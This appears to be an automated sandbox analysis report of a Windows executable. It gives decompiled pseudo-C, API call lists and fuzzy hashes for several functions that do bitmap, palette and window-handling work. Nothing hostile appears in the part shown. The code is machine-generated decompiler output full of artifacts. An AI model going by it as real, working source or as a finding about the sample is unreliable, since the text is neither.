                                                                        0x004252e7
                                                                        0x004252ee
                                                                        0x004252f1
                                                                        0x00425310
                                                                        0x00425313
                                                                        0x00425316
                                                                        0x00425326
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0042515d
                                                                        0x0042515d
                                                                        0x0042515f
                                                                        0x00425169
                                                                        0x0042516e
                                                                        0x0042516f
                                                                        0x00425174
                                                                        0x00425177
                                                                        0x0042517d
                                                                        0x00425182
                                                                        0x00425195
                                                                        0x004251af
                                                                        0x004251b4
                                                                        0x004251ba
                                                                        0x004251bf
                                                                        0x004251c1
                                                                        0x004251cd
                                                                        0x004251df
                                                                        0x004251e6
                                                                        0x004251e6
                                                                        0x004251ed
                                                                        0x004251ee
                                                                        0x004251f3
                                                                        0x004251f6
                                                                        0x0042520f
                                                                        0x00425216
                                                                        0x0042521f
                                                                        0x00425228
                                                                        0x00425221
                                                                        0x00425221
                                                                        0x00425221
                                                                        0x0042521f
                                                                        0x0042522f
                                                                        0x00425232
                                                                        0x00425235
                                                                        0x0042523e
                                                                        0x0042524a
                                                                        0x0042524a
                                                                        0x00425262
                                                                        0x00425262

                                                                        APIs
                                                                        • GetDC.USER32(00000000), ref: 00425126
                                                                        • CreateCompatibleDC.GDI32(00000001), ref: 0042518B
                                                                        • CreateCompatibleBitmap.GDI32(00000001,00000001,00000001), ref: 004251A0
                                                                        • SelectObject.GDI32(?,00000000), ref: 004251AA
                                                                        • SelectPalette.GDI32(?,?,00000000), ref: 004251DA
                                                                        • RealizePalette.GDI32(?), ref: 004251E6
                                                                        • CreateDIBitmap.GDI32(?,?,00000004,00000000,?,00000000), ref: 0042520A
                                                                        • GetLastError.KERNEL32(?,?,00000004,00000000,?,00000000,00000000,00425263,?,?,00000000,00000001,00000001,00000001,00000001,00000000), ref: 00425218
                                                                        • SelectPalette.GDI32(?,00000000,000000FF), ref: 0042524A
                                                                        • SelectObject.GDI32(?,?), ref: 00425257
                                                                        • DeleteObject.GDI32(00000000), ref: 0042525D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Select$CreateObjectPalette$BitmapCompatible$DeleteErrorLastRealize
                                                                        • String ID: ($BM$x#A
                                                                        • API String ID: 2831685396-1550879612
                                                                        • Opcode ID: b91efd67f6c95568d4d1e3cc61e066766e2b2bd289b766a2555f1655cfd9dfd3
                                                                        • Instruction ID: 3b266c622e7d5c61ee199f7101d8b2b068e3375d9a97a10e13efc2d829a2294f
                                                                        • Opcode Fuzzy Hash: b91efd67f6c95568d4d1e3cc61e066766e2b2bd289b766a2555f1655cfd9dfd3
                                                                        • Instruction Fuzzy Hash: 6FD14C70B002189FDF04DFA9D885BAEBBF5EF49304F51846AE905EB395D7389840CB69
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0046745C, Relevance: 28.5, APIs: 15, Strings: 1, Instructions: 468COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 83%
                                                                        			E0046745C(intOrPtr __eax, char __edx) {
				intOrPtr _v8;
				char _v9;
				intOrPtr* _v16;
				intOrPtr* _v20;
				intOrPtr* _v24;
				intOrPtr _v28;
				char _v44;
				char _v60;
				void* __edi;
				void* __ebp;
				signed int _t170;
				signed int _t176;
				void* _t209;
				void* _t213;
				intOrPtr _t218;
				intOrPtr _t241;
				void* _t254;
				struct HDC__* _t273;
				struct HDC__* _t287;
				void* _t327;
				void* _t348;
				void* _t365;
				void* _t372;
				intOrPtr _t387;
				intOrPtr _t393;
				struct HDC__* _t397;
				struct HDC__* _t398;
				struct HDC__* _t399;
				void* _t426;
				void* _t427;
				void* _t428;
				intOrPtr _t452;
				intOrPtr _t469;
				void* _t483;
				int _t491;
				int _t496;
				void* _t498;
				void* _t500;
				intOrPtr _t501;
				void* _t511;

				_t498 = _t500;
				_t501 = _t500 + 0xffffffc8;
				_v9 = __edx;
				_v8 = __eax;
				if(_v9 == 2 &&  *(_v8 + 0x20) < 3) {
					_v9 = 0;
				}
				_t393 =  *((intOrPtr*)(_v8 + 0xc));
				if(_t393 != 0xffffffff) {
					L24:
					return _t393;
				} else {
					_t170 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 4)))) + 0x2c))();
					if((_t170 |  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 4)))) + 0x20))()) == 0) {
						goto L24;
					} else {
						_t176 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 4)))) + 0x2c))();
						asm("cdq");
						_t491 = _t176 / ( *(_v8 + 0x20) & 0x000000ff);
						_t496 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 4)))) + 0x20))();
						if( *((intOrPtr*)(_v8 + 8)) == 0) {
							_t508 =  *0x47ac64;
							if( *0x47ac64 == 0) {
								 *0x47ac64 = E00467150(1);
							}
							_t387 =  *0x47ac64; // 0x0
							 *((intOrPtr*)(_v8 + 8)) = E004671C4(_t387, _t496, _t491);
						}
						_v16 = E004242CC(1);
						 *[fs:eax] = _t501;
						 *((intOrPtr*)( *_v16 + 0x40))( *[fs:eax], 0x467a0b, _t498);
						 *((intOrPtr*)( *_v16 + 0x34))();
						E00412BCC(_t491, 0,  &_v44, _t496);
						E0041FC50( *((intOrPtr*)(E00424894(_v16) + 0x14)), _t491, 0x8000000f, _t491, _t498, _t508);
						E0042405C( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 4)))) + 0x24))());
						 *((intOrPtr*)( *_v16 + 0x38))();
						if(_v9 >=  *(_v8 + 0x20)) {
						}
						E00412BCC(1 * _t491, 0,  &_v60, _t496);
						_t209 = _v9 - 1;
						_t511 = _t209;
						if(_t511 < 0) {
							L14:
							_push( &_v60);
							_t213 = E00424894( *((intOrPtr*)(_v8 + 4)));
							E00420180(E00424894(_v16),  &_v44, _t512, _t213);
							_t218 =  *((intOrPtr*)(_v8 + 4));
							_t513 =  *((char*)(_t218 + 0x38)) - 1;
							if( *((char*)(_t218 + 0x38)) != 1) {
								 *((intOrPtr*)(_v8 + 0xc)) = E004670F4( *((intOrPtr*)(_v8 + 8)), 0x20000000, _v16, __eflags);
							} else {
								 *((intOrPtr*)(_v8 + 0xc)) = E004670F4( *((intOrPtr*)(_v8 + 8)),  *((intOrPtr*)(_v8 + 0x1c)), _v16, _t513);
							}
							goto L23;
						} else {
							if(_t511 == 0) {
								_v24 = 0;
								_v20 = 0;
								 *[fs:eax] = _t501;
								_v24 = E004242CC(1);
								_v20 = E004242CC(1);
								 *((intOrPtr*)( *_v20 + 8))( *[fs:eax], 0x4679cf, _t498);
								 *((intOrPtr*)( *_v20 + 0x6c))();
								_t241 = _v8;
								__eflags =  *((char*)(_t241 + 0x20)) - 1;
								if( *((char*)(_t241 + 0x20)) <= 1) {
									 *((intOrPtr*)( *_v24 + 8))();
									 *((intOrPtr*)( *_v24 + 0x6c))();
									E0041FC50( *((intOrPtr*)(E00424894(_v24) + 0x14)),  *_v24, 0, _t491, _t498, __eflags);
									_t420 =  *_v24;
									 *((intOrPtr*)( *_v24 + 0x40))();
									_t254 = E00424950(_v24);
									__eflags = _t254;
									if(_t254 != 0) {
										E0041F464( *((intOrPtr*)(E00424894(_v24) + 0xc)), 0xffffff);
										__eflags = 0;
										E004256E4(_v24, 0);
										E0041FC50( *((intOrPtr*)(E00424894(_v24) + 0x14)), _t420, 0xffffff, _t491, _t498, __eflags);
									}
									E004256E4(_v24, 1);
									_t396 = E00424894(_v16);
									E0041FC50( *((intOrPtr*)(_t258 + 0x14)), _t420, 0x8000000f, _t491, _t498, __eflags);
									E004202E8(_t258,  &_v44);
									E0041FC50( *((intOrPtr*)(_t258 + 0x14)), _t420, 0x80000014, _t491, _t498, __eflags);
									SetTextColor(E00420730(_t396), 0);
									SetBkColor(E00420730(_t396), 0xffffff);
									_t273 = E00420730(E00424894(_v24));
									BitBlt(E00420730(_t396), 1, 1, _t491, _t496, _t273, 0, 0, 0xe20746);
									E0041FC50( *((intOrPtr*)(_t396 + 0x14)), _t420, 0x80000010, _t491, _t498, __eflags);
									SetTextColor(E00420730(_t396), 0);
									SetBkColor(E00420730(_t396), 0xffffff);
									_t287 = E00420730(E00424894(_v24));
									BitBlt(E00420730(_t396), 0, 0, _t491, _t496, _t287, 0, 0, 0xe20746);
								} else {
									_v28 = E00424894(_v16);
									E00424894(_v20);
									E00420180(_v28,  &_v44, __eflags,  &_v60);
									E004256E4(_v24, 1);
									 *((intOrPtr*)( *_v24 + 0x40))();
									 *((intOrPtr*)( *_v24 + 0x34))();
									E0041FC50( *((intOrPtr*)(E00424894(_v20) + 0x14)),  *_v24, 0xffffff, _t491, _t498, __eflags);
									_push( &_v60);
									_push(E00424894(_v20));
									_t327 = E00424894(_v24);
									_pop(_t426);
									E00420180(_t327,  &_v44, __eflags);
									E0041FC50( *((intOrPtr*)(_v28 + 0x14)), _t426, 0x80000014, _t491, _t498, __eflags);
									_t397 = E00420730(_v28);
									SetTextColor(_t397, 0);
									SetBkColor(_t397, 0xffffff);
									BitBlt(_t397, 0, 0, _t491, _t496, E00420730(E00424894(_v24)), 0, 0, 0xe20746);
									E0041FC50( *((intOrPtr*)(E00424894(_v20) + 0x14)), _t426, 0x808080, _t491, _t498, __eflags);
									_push( &_v60);
									_push(E00424894(_v20));
									_t348 = E00424894(_v24);
									_pop(_t427);
									E00420180(_t348,  &_v44, __eflags);
									E0041FC50( *((intOrPtr*)(_v28 + 0x14)), _t427, 0x80000010, _t491, _t498, __eflags);
									_t398 = E00420730(_v28);
									SetTextColor(_t398, 0);
									SetBkColor(_t398, 0xffffff);
									BitBlt(_t398, 0, 0, _t491, _t496, E00420730(E00424894(_v24)), 0, 0, 0xe20746);
									_push(E0041EFA4( *((intOrPtr*)(_v8 + 0x1c))));
									_t365 = E00424894(_v20);
									_pop(_t483);
									E0041FC50( *((intOrPtr*)(_t365 + 0x14)), _t427, _t483, _t491, _t498, __eflags);
									_push( &_v60);
									_push(E00424894(_v20));
									_t372 = E00424894(_v24);
									_pop(_t428);
									E00420180(_t372,  &_v44, __eflags);
									E0041FC50( *((intOrPtr*)(_v28 + 0x14)), _t428, 0x8000000f, _t491, _t498, __eflags);
									_t399 = E00420730(_v28);
									SetTextColor(_t399, 0);
									SetBkColor(_t399, 0xffffff);
									BitBlt(_t399, 0, 0, _t491, _t496, E00420730(E00424894(_v24)), 0, 0, 0xe20746);
								}
								__eflags = 0;
								_pop(_t469);
								 *[fs:eax] = _t469;
								_push(0x4679d6);
								E004035DC(_v20);
								return E004035DC(_v24);
							} else {
								_t512 = _t209 - 0xffffffffffffffff;
								if(_t209 - 0xffffffffffffffff < 0) {
									goto L14;
								}
								L23:
								_pop(_t452);
								 *[fs:eax] = _t452;
								_push(0x467a12);
								return E004035DC(_v16);
							}
						}
					}
				}
			}











































                                                                        0x0046745d
                                                                        0x0046745f
                                                                        0x00467465
                                                                        0x00467468
                                                                        0x0046746f
                                                                        0x0046747a
                                                                        0x0046747a
                                                                        0x00467486
                                                                        0x0046748d
                                                                        0x00467a29
                                                                        0x00467a31
                                                                        0x00467493
                                                                        0x0046749b
                                                                        0x004674ad
                                                                        0x00000000
                                                                        0x004674b3
                                                                        0x004674bb
                                                                        0x004674c7
                                                                        0x004674ca
                                                                        0x004674d7
                                                                        0x004674e0
                                                                        0x004674e2
                                                                        0x004674e9
                                                                        0x004674f7
                                                                        0x004674f7
                                                                        0x00467500
                                                                        0x0046750d
                                                                        0x0046750d
                                                                        0x0046751c
                                                                        0x0046752a
                                                                        0x00467534
                                                                        0x0046753e
                                                                        0x0046754c
                                                                        0x00467561
                                                                        0x00467571
                                                                        0x0046757d
                                                                        0x00467589
                                                                        0x00467589
                                                                        0x004675a2
                                                                        0x004675aa
                                                                        0x004675aa
                                                                        0x004675ac
                                                                        0x004675b9
                                                                        0x004675bc
                                                                        0x004675c3
                                                                        0x004675d5
                                                                        0x004675dd
                                                                        0x004675e0
                                                                        0x004675e4
                                                                        0x00467626
                                                                        0x004675e6
                                                                        0x00467602
                                                                        0x00467602
                                                                        0x00000000
                                                                        0x004675ae
                                                                        0x004675ae
                                                                        0x00467631
                                                                        0x00467636
                                                                        0x00467644
                                                                        0x00467653
                                                                        0x00467662
                                                                        0x00467670
                                                                        0x0046767a
                                                                        0x0046767d
                                                                        0x00467680
                                                                        0x00467684
                                                                        0x0046786d
                                                                        0x00467877
                                                                        0x00467887
                                                                        0x00467891
                                                                        0x00467893
                                                                        0x00467899
                                                                        0x0046789e
                                                                        0x004678a0
                                                                        0x004678b2
                                                                        0x004678b7
                                                                        0x004678bc
                                                                        0x004678d1
                                                                        0x004678d1
                                                                        0x004678db
                                                                        0x004678e8
                                                                        0x004678f2
                                                                        0x004678fc
                                                                        0x00467909
                                                                        0x00467918
                                                                        0x0046792a
                                                                        0x00467940
                                                                        0x00467954
                                                                        0x00467961
                                                                        0x00467970
                                                                        0x00467982
                                                                        0x00467998
                                                                        0x004679ac
                                                                        0x0046768a
                                                                        0x00467692
                                                                        0x0046769c
                                                                        0x004676a9
                                                                        0x004676b3
                                                                        0x004676bf
                                                                        0x004676c9
                                                                        0x004676dc
                                                                        0x004676e4
                                                                        0x004676ed
                                                                        0x004676f1
                                                                        0x004676f9
                                                                        0x004676fa
                                                                        0x0046770a
                                                                        0x00467717
                                                                        0x0046771c
                                                                        0x00467727
                                                                        0x0046774a
                                                                        0x0046775f
                                                                        0x00467767
                                                                        0x00467770
                                                                        0x00467774
                                                                        0x0046777c
                                                                        0x0046777d
                                                                        0x0046778d
                                                                        0x0046779a
                                                                        0x0046779f
                                                                        0x004677aa
                                                                        0x004677cd
                                                                        0x004677dd
                                                                        0x004677e1
                                                                        0x004677e9
                                                                        0x004677ea
                                                                        0x004677f2
                                                                        0x004677fb
                                                                        0x004677ff
                                                                        0x00467807
                                                                        0x00467808
                                                                        0x00467818
                                                                        0x00467825
                                                                        0x0046782a
                                                                        0x00467835
                                                                        0x00467858
                                                                        0x00467858
                                                                        0x004679b1
                                                                        0x004679b3
                                                                        0x004679b6
                                                                        0x004679b9
                                                                        0x004679c1
                                                                        0x004679ce
                                                                        0x004675b0
                                                                        0x004675b1
                                                                        0x004675b3
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004679f5
                                                                        0x004679f7
                                                                        0x004679fa
                                                                        0x004679fd
                                                                        0x00467a0a
                                                                        0x00467a0a
                                                                        0x004675ae
                                                                        0x004675ac
                                                                        0x004674ad

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: DA
                                                                        • API String ID: 0-2080325668
                                                                        • Opcode ID: f65dbce997301d1b3ac4fc3d648d70f44be36d711d5e80a2521b17264e575958
                                                                        • Instruction ID: 1aaab0506d005b2b6a366c37f16578aea9443783ae75c99a7e7321e86aad177a
                                                                        • Opcode Fuzzy Hash: f65dbce997301d1b3ac4fc3d648d70f44be36d711d5e80a2521b17264e575958
                                                                        • Instruction Fuzzy Hash: FC025074B04115AFD700EBA9D986E9EB7F5EF48318F10456AF404EB392DA38ED01CB69
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004787FC, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 174windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 97%
                                                                        			E004787FC(int __eax, void* __eflags) {
				int _v8;
				char* _t87;
				int _t89;
				long _t92;
				int _t117;
				struct HWND__* _t146;
				void* _t149;
				void* _t150;
				struct HWND__* _t151;
				intOrPtr _t162;
				struct HWND__* _t168;
				void* _t170;
				struct HWND__* _t171;
				struct HWND__* _t172;
				intOrPtr _t174;
				intOrPtr _t176;

				_t174 = _t176;
				_v8 = __eax;
				E0042D3EC(_v8);
				_t146 = GetWindow(E0043CC2C(_v8), 5);
				 *(_v8 + 0x248) = _t146;
				_t168 = _t146;
				 *(_v8 + 0x268) = _t168;
				 *((intOrPtr*)(_v8 + 0x26c)) = GetWindowLongA(_t168, 0xfffffffc);
				SetWindowLongA( *(_v8 + 0x268), 0xfffffffc,  *(_v8 + 0x270));
				if( *((intOrPtr*)(_v8 + 0x281)) - 2 < 0) {
					_t151 = GetWindow(GetWindow(E0043CC2C(_v8), 5), 5);
					if(_t151 != 0) {
						if( *((char*)(_v8 + 0x281)) == 1) {
							_t172 = _t151;
							 *(_v8 + 0x244) = _t172;
							 *((intOrPtr*)(_v8 + 0x258)) = GetWindowLongA(_t172, 0xfffffffc);
							SetWindowLongA( *(_v8 + 0x244), 0xfffffffc,  *(_v8 + 0x254));
							_t151 = GetWindow(_t151, 2);
						}
						_t171 = _t151;
						 *(_v8 + 0x240) = _t171;
						 *((intOrPtr*)(_v8 + 0x250)) = GetWindowLongA(_t171, 0xfffffffc);
						SetWindowLongA( *(_v8 + 0x240), 0xfffffffc,  *(_v8 + 0x24c));
					}
				}
				_t87 =  *0x495a04; // 0x496b70
				if( *_t87 != 0 &&  *(_v8 + 0x240) != 0) {
					SendMessageA( *(_v8 + 0x240), 0xd3, 3, 0);
				}
				if( *((intOrPtr*)(_v8 + 0x27c)) == 0) {
					_t89 = _v8;
					if( *((intOrPtr*)(_t89 + 0x278)) != 0) {
						_t92 = E004436E8( *((intOrPtr*)(_v8 + 0x278)));
						_t89 = PostMessageA(E0043CC2C(_v8), 0x402, 0, _t92);
					}
					return _t89;
				} else {
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x284)))) + 0x20))();
					 *((char*)(_v8 + 0x280)) = 1;
					 *[fs:eax] = _t176;
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x284)))) + 8))( *[fs:eax], 0x4789fe, _t174);
					_t149 = E0041521C( *((intOrPtr*)(_v8 + 0x284))) - 1;
					if(_t149 >= 0) {
						_t150 = _t149 + 1;
						_t170 = 0;
						do {
							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x284)))) + 0x2c))();
							_t170 = _t170 + 1;
							_t150 = _t150 - 1;
						} while (_t150 != 0);
					}
					E0040BAFC(_v8 + 0x27c);
					E004366A0(_v8);
					_pop(_t162);
					 *[fs:eax] = _t162;
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x284)))) + 0x24))(0x478a05);
					_t117 = _v8;
					 *((char*)(_t117 + 0x280)) = 0;
					return _t117;
				}
			}



















                                                                        0x004787fd
                                                                        0x00478802
                                                                        0x00478808
                                                                        0x0047881d
                                                                        0x00478822
                                                                        0x00478828
                                                                        0x0047882d
                                                                        0x0047883e
                                                                        0x0047885a
                                                                        0x0047886a
                                                                        0x00478888
                                                                        0x0047888c
                                                                        0x0047889c
                                                                        0x004788a1
                                                                        0x004788a3
                                                                        0x004788b4
                                                                        0x004788d0
                                                                        0x004788dd
                                                                        0x004788dd
                                                                        0x004788e2
                                                                        0x004788e4
                                                                        0x004788f5
                                                                        0x00478911
                                                                        0x00478911
                                                                        0x0047888c
                                                                        0x00478916
                                                                        0x0047891e
                                                                        0x0047893f
                                                                        0x0047893f
                                                                        0x0047894e
                                                                        0x00478a05
                                                                        0x00478a0f
                                                                        0x00478a1a
                                                                        0x00478a30
                                                                        0x00478a30
                                                                        0x00478a39
                                                                        0x00478954
                                                                        0x0047895f
                                                                        0x00478965
                                                                        0x00478977
                                                                        0x0047898e
                                                                        0x004789a1
                                                                        0x004789a4
                                                                        0x004789a6
                                                                        0x004789a7
                                                                        0x004789a9
                                                                        0x004789b6
                                                                        0x004789b9
                                                                        0x004789ba
                                                                        0x004789ba
                                                                        0x004789a9
                                                                        0x004789c5
                                                                        0x004789d3
                                                                        0x004789da
                                                                        0x004789dd
                                                                        0x004789f0
                                                                        0x004789f3
                                                                        0x004789f6
                                                                        0x004789fd
                                                                        0x004789fd

                                                                        APIs
                                                                          • Part of subcall function 0042D3EC: SendMessageA.USER32 ref: 0042D40C
                                                                        • GetWindow.USER32(00000000,00000005), ref: 00478818
                                                                        • GetWindowLongA.USER32 ref: 00478836
                                                                        • SetWindowLongA.USER32 ref: 0047885A
                                                                        • GetWindow.USER32(00000000,00000005), ref: 0047887D
                                                                        • GetWindow.USER32(00000000,00000000), ref: 00478883
                                                                        • GetWindowLongA.USER32 ref: 004788AC
                                                                        • SetWindowLongA.USER32 ref: 004788D0
                                                                        • GetWindow.USER32(00000000,00000002), ref: 004788D8
                                                                        • GetWindowLongA.USER32 ref: 004788ED
                                                                        • SetWindowLongA.USER32 ref: 00478911
                                                                        • SendMessageA.USER32 ref: 0047893F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Window$Long$MessageSend
                                                                        • String ID: pkI
                                                                        • API String ID: 1593136606-582613530
                                                                        • Opcode ID: 09410902df89b846111bdeff082548eb55f2a0ece770c2cd8f137be4d5937d4f
                                                                        • Instruction ID: c93d556c733353f28b80892d9748ad900ab6ec26727c7c5ce3df2aa97b74d364
                                                                        • Opcode Fuzzy Hash: 09410902df89b846111bdeff082548eb55f2a0ece770c2cd8f137be4d5937d4f
                                                                        • Instruction Fuzzy Hash: CB61F074A04105EFDB10EB99C989E9D77F4EB09314F2541F9F508AB3A2CB74AE40DB54
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004245C4, Relevance: 21.2, APIs: 14, Instructions: 217windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 78%
                                                                        			E004245C4(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				struct HPALETTE__* _v12;
				char _v13;
				struct tagPOINT _v21;
				struct HDC__* _v28;
				void* _v32;
				struct HPALETTE__* _t74;
				signed int _t80;
				signed int _t81;
				char _t82;
				void* _t89;
				void* _t135;
				intOrPtr* _t165;
				intOrPtr _t173;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr _t179;
				intOrPtr _t181;
				int* _t185;
				intOrPtr _t187;
				void* _t189;
				void* _t190;
				intOrPtr _t191;

				_t166 = __ecx;
				_t189 = _t190;
				_t191 = _t190 + 0xffffffe4;
				_t185 = __ecx;
				_v8 = __edx;
				_t165 = __eax;
				_t187 =  *((intOrPtr*)(__eax + 0x28));
				_t173 =  *0x424810; // 0xf
				E00420804(_v8, __ecx, _t173);
				E00424C34(_t165);
				_v12 = 0;
				_v13 = 0;
				_t74 =  *(_t187 + 0x10);
				if(_t74 != 0) {
					_v12 = SelectPalette( *(_v8 + 4), _t74, 0xffffffff);
					RealizePalette( *(_v8 + 4));
					_v13 = 1;
				}
				_push(GetDeviceCaps( *(_v8 + 4), 0xc));
				_t80 = GetDeviceCaps( *(_v8 + 4), 0xe);
				_pop(_t174);
				_t81 = _t174 * _t80;
				if(_t81 > 8) {
					L4:
					_t82 = 0;
				} else {
					_t166 =  *(_t187 + 0x28) & 0x0000ffff;
					if(_t81 < ( *(_t187 + 0x2a) & 0x0000ffff) * ( *(_t187 + 0x28) & 0x0000ffff)) {
						_t82 = 1;
					} else {
						goto L4;
					}
				}
				if(_t82 == 0) {
					if(E00424950(_t165) == 0) {
						SetStretchBltMode(E00420730(_v8), 3);
					}
				} else {
					GetBrushOrgEx( *(_v8 + 4),  &_v21);
					SetStretchBltMode( *(_v8 + 4), 4);
					SetBrushOrgEx( *(_v8 + 4), _v21, _v21.y,  &_v21);
				}
				_push(_t189);
				_push(0x424801);
				_push( *[fs:eax]);
				 *[fs:eax] = _t191;
				if( *((intOrPtr*)( *_t165 + 0x28))() != 0) {
					E00424BD4(_t165, _t166);
				}
				_t89 = E00424894(_t165);
				_t177 =  *0x424810; // 0xf
				E00420804(_t89, _t166, _t177);
				if( *((intOrPtr*)( *_t165 + 0x28))() == 0) {
					StretchBlt( *(_v8 + 4),  *_t185, _t185[1], _t185[2] -  *_t185, _t185[3] - _t185[1],  *(E00424894(_t165) + 4), 0, 0,  *(_t187 + 0x1c),  *(_t187 + 0x20),  *(_v8 + 0x20));
					_pop(_t179);
					 *[fs:eax] = _t179;
					_push(E00424808);
					if(_v13 != 0) {
						return SelectPalette( *(_v8 + 4), _v12, 0xffffffff);
					}
					return 0;
				} else {
					_v32 = 0;
					_v28 = 0;
					_push(_t189);
					_push(0x424796);
					_push( *[fs:eax]);
					 *[fs:eax] = _t191;
					_v28 = E00420B28(CreateCompatibleDC(0));
					_v32 = SelectObject(_v28,  *(_t187 + 0xc));
					E00420CCC( *(_v8 + 4), _t165, _t185[1],  *_t185, _t185, _t187, 0, 0, _v28,  *(_t187 + 0x20),  *(_t187 + 0x1c), 0, 0,  *(E00424894(_t165) + 4), _t185[3] - _t185[1], _t185[2] -  *_t185);
					_t135 = 0;
					_pop(_t181);
					 *[fs:eax] = _t181;
					_push(0x4247db);
					if(_v32 != 0) {
						_t135 = SelectObject(_v28, _v32);
					}
					if(_v28 != 0) {
						return DeleteDC(_v28);
					}
					return _t135;
				}
			}


























                                                                        0x004245c4
                                                                        0x004245c5
                                                                        0x004245c7
                                                                        0x004245cd
                                                                        0x004245cf
                                                                        0x004245d2
                                                                        0x004245d4
                                                                        0x004245d7
                                                                        0x004245e0
                                                                        0x004245e7
                                                                        0x004245ee
                                                                        0x004245f1
                                                                        0x004245f5
                                                                        0x004245fa
                                                                        0x0042460b
                                                                        0x00424615
                                                                        0x0042461a
                                                                        0x0042461a
                                                                        0x0042462c
                                                                        0x00424636
                                                                        0x0042463b
                                                                        0x0042463f
                                                                        0x00424644
                                                                        0x00424655
                                                                        0x00424655
                                                                        0x00424646
                                                                        0x0042464a
                                                                        0x00424653
                                                                        0x00424659
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00424653
                                                                        0x0042465d
                                                                        0x004246a0
                                                                        0x004246ad
                                                                        0x004246ad
                                                                        0x0042465f
                                                                        0x0042466a
                                                                        0x00424678
                                                                        0x00424690
                                                                        0x00424690
                                                                        0x004246b4
                                                                        0x004246b5
                                                                        0x004246ba
                                                                        0x004246bd
                                                                        0x004246c9
                                                                        0x004246cd
                                                                        0x004246cd
                                                                        0x004246d4
                                                                        0x004246d9
                                                                        0x004246df
                                                                        0x004246ed
                                                                        0x004247d6
                                                                        0x004247dd
                                                                        0x004247e0
                                                                        0x004247e3
                                                                        0x004247ec
                                                                        0x00000000
                                                                        0x004247fb
                                                                        0x00424800
                                                                        0x004246f3
                                                                        0x004246f5
                                                                        0x004246fa
                                                                        0x004246ff
                                                                        0x00424700
                                                                        0x00424705
                                                                        0x00424708
                                                                        0x00424717
                                                                        0x00424727
                                                                        0x00424761
                                                                        0x00424766
                                                                        0x00424768
                                                                        0x0042476b
                                                                        0x0042476e
                                                                        0x00424777
                                                                        0x00424781
                                                                        0x00424781
                                                                        0x0042478a
                                                                        0x00000000
                                                                        0x00424790
                                                                        0x00424795
                                                                        0x00424795

                                                                        APIs
                                                                          • Part of subcall function 00424C34: GetDC.USER32(00000000), ref: 00424C8A
                                                                          • Part of subcall function 00424C34: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00424C9F
                                                                          • Part of subcall function 00424C34: GetDeviceCaps.GDI32(00000000,0000000E), ref: 00424CA9
                                                                          • Part of subcall function 00424C34: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,0042378B,00000000,00423817), ref: 00424CCD
                                                                          • Part of subcall function 00424C34: ReleaseDC.USER32 ref: 00424CD8
                                                                        • SelectPalette.GDI32(?,?,000000FF), ref: 00424606
                                                                        • RealizePalette.GDI32(?), ref: 00424615
                                                                        • GetDeviceCaps.GDI32(?,0000000C), ref: 00424627
                                                                        • GetDeviceCaps.GDI32(?,0000000E), ref: 00424636
